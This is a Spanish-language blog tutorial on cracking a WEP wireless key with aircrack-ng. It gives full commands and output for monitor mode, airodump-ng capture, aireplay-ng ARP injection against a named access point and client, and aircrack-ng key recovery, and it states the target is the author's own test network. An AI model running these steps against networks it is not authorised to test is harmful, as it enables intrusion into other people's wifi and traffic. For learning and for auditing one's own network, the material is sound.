Guatewireless.org

Finalmente les comparto los simples pasos para romper una clave WEP inalambrica utilizando el software libre llamado air crack.
El metodo de desencripcion se realiza al escuchar o realizar el sniffing de la red, luego la captura de los paquetes encriptados, para luego ejecutar el software que descubre o descifra los datos capturados.

Que es WEP?

WEP (Wired Equivalent Privacy) es bastante fácil de descifrar, ya que utiliza una sola clave para cifrar todo el tráfico.

Basicamente, la comunicacion entre dos nodos de una red wifi se basa en la direccino MAC. En el modelo, cada anfitrion recibira tan solo los paquetes destinados para la direccion MAC de su interfaz.

Esta comunicacion se mantiene privada gracias a la llave de encripcion WEP. Sin embargo, si un cliente establece  su tarjeta de red en modo de escucha o promiscuo, esta tambien recibira los paquetes TCP/UDP/IP encriptados de otros clientes en la red.

Como se crackea la WEP

Antes de ver los comandos tecnicos para lograr obtener la clave de un ssid, les voy a comentar el procedimiento del wep crack;

Para poder romper la llave WEP necesitamos capturar una gran cantidad de paquetes de la red inalambrica destinados para un cliente previamente autenticado y conectado a la red.

En otras palabras, tomamos  en nuestra maquina una muestra en vivo de los miles de paquetes  que son transmitidos en la red.

Luego ejecutamos el software que compara las llaves de prueba contra la llave WEP dentro de los paquetes para intentar la desencripcion.

Esta guia asume que tienen una tarjeta para redes inalambricas que soporte modo monitor. Y que la red que estan testeando es propia y tienen permiso para realizar nuestras pruebas y hay al menos otra pc conectada.

Como Instalar AIR Crack

La instalacion de la herrameinta aircrack para sistemas linux es realmente sencillo, tan solo tecleamos;

Debian, Ubuntu:

:~# apt-get install aircrack-ng

Fedora:

:~# yum -y install aircrack-ng

Identificar nuestra interfaz WiFi

Si nuestra tarjeta de red wireless esta correctamente instalada en nuestro linux, podemos verla ejecutando;

$ iwconfig

wlan0     IEEE 802.11  Access Point: Not-Associated

          Link Quality:4  Signal level:197  Noise level:171

          Rx invalid nwid:0  invalid crypt:0  invalid misc:0

# iwconfig

wlan0      IEEE 802.11bg  ESSID:""

          Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated

          Bit Rate:54 Mb/s   Tx-Power:24 dBm

          Retry min limit:7   RTS thr:off   Fragment thr:off

          Encryption key:off

          Power Managementmode:All packets received

          Link Quality=5/5  Signal level=0 dBm  Noise level=0 dBm

          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0

          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Se pueden dar cuenta por le segundo display de que nos muestra mas informacion en modo super usuario root.

Encendemos el modo de monitoreo

Segun el resultado del comando anterior, habilitamos el modo de monitor en nuestra tarjeta WiFi;

:~# airmon-ng start wlan0

Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID	Name
821	NetworkManager
822	avahi-daemon
826	avahi-daemon
848	wpa_supplicant
6726	dhclient
Process with PID 6726 (dhclient) is running on interface eth2

Interface    Chipset        Driver

wlan0        Intel 4965/5xxx    iwlagn - [phy0]
 (monitor mode enabled on mon0)

En mi laptop con Ubuntu 10 me saca los mensajes anteriores, pero el que nos sirve es donde dice que el modo de monitor esta habilitado.

Buscar un BSSID de red inalambrica

Ahora toca escanear el spectro de radio, y encontrar la señal de nuestra red inalambrica objetivo. Entonces, para poder conocer cuales redes WiFi nos rodean, teclamos:

:~# airodump-ng mon0

CH  6 ][ Elapsed: 28 s ][ 2010-12-28 20:42
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:27:19:16:8D:1E  -73      273       26    0   6  54 . WEP              REDCASERA
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 00:27:19:16:8D:1E  00:21:5C:98:38:93    0   24 -12      0       26

Como vemos en mi escaneo anterior, nos muestra mi red de prueba para este ejemplo. La informacion importante que nos sirve es:

Punto de acceso inalambrico:

BSSID : 00:27:19:16:8D:1E

Canal : 6

Cliente WiFi:

MAC: 00:21:5C:98:38:93

Para nuestro experimento definitivamente es necesario que algun cliente este asociado con el router wireless para obtener los paquetes necesarios, de lo contrario nos tardaremos semanas. Claro que existen metodos para forzar los paquetes sin cliente, pero eso es tema de otro articulo.

Capturando paquetes de la red inalambrica

Llegamos a la parte de este articulo donde empezamos realmente la tarea de crackear la WEP de una red. Es recomendable que capturen la mayor cantidad de paquetes posibles, estamos hablando de unos 5000 a 30000, todo depende del largo de la llave WEP.

El siguiente comando -c es el canal del router wifi, y mon0 es la interface virtual (en mi caso) de nuestro linux.

# airodump-ng -c 6 -w archivo_captura_redcasera mon0

Como podran ver a continuacion, tan solo han pasado 3 minutos y ya tenemos casi 6mil paquetes.

CH  6 ][ Elapsed: 3 mins ][ 2010-12-28 21:06                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:27:19:16:8D:1E  -74  96     2122     5768   77   6  54 . WEP              REDCASERA

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 (not associated)   00:22:69:77:11:92  -82    0 - 1      0       14
 00:27:19:16:8D:1E  00:21:5C:98:38:93    0   36 -36      2     5770  REDCASERA

Inyectando paquetes

Gracias a que en la REDCASERA de ejemplo estoy viendo un video en youtube la cantidad de paquetes ha subido rapidamente.

Pero en el caso de que pase mucho tiempo y no tenemos paquetes, tambien es posible crear trafico para capturar paquetes mucho mas rapido, ejecutando en otra terminal:

:~# aireplay-ng -3 -b 00:27:19:16:8D:1E -h 00:21:5C:98:38:93 mon0
21:14:21  Waiting for beacon frame (BSSID: 00:27:19:16:8D:1E) on channel 6
Saving ARP requests in replay_arp-1228-211421.cap
You should also start airodump-ng to capture replies.
Read 223 packets (got 0 ARP requests and 1 ACKs), sent 0 packets...(0 pps)

Crack de la clave WEP inalámbrica

Finalmente llegamos al ultimo paso para obtener la llave de la red wifi. Ahora nos toca utilizar el comando aircrack el cual es el que se encarga de obtener la llave WEP mediante los paquetes que capturamos en el archivo archivo_captura_redcasera.cap.

:~# aircrack-ng -z archivo_captura_redcasera-01.cap
Opening archivo_captura_redcasera-01.cap
Read 9782 packets.

 #  BSSID              ESSID                     Encryption

 1  00:27:19:16:8D:1E  REDCASERA                 WEP (248 IVs)
 2  00:90:D0:E4:D1:D3  TURBONETT                 No data - WEP or WPA
 3  00:15:6D:55:BA:8E                            WEP (1 IVs)

Index number of target network ? 1                               

                         Aircrack-ng 1.0 rc1

               [00:00:33] Tested 485 keys (got 16690 IVs)

   KB    depth   byte(vote)
    0    9/ 13   00(20992) 06(20736) 27(20736) 3F(20736) A2(20736)
    1    0/  1   F3(28416) A8(23296) 34(21248) 57(21248) A3(21248)
    2    0/  2   8E(25856) BC(23808) 3F(23040) D2(22784) 69(21504)
    3    0/  5   6E(24320) 35(22528) 5A(22016) 95(22016) B8(22016)
    4    3/  4   98(21504) 7C(20992) 84(20992) E0(20992) F0(20992)

                         KEY FOUND! [ 3F:F3:8E:6E:98 ]
        Decrypted correctly: 100%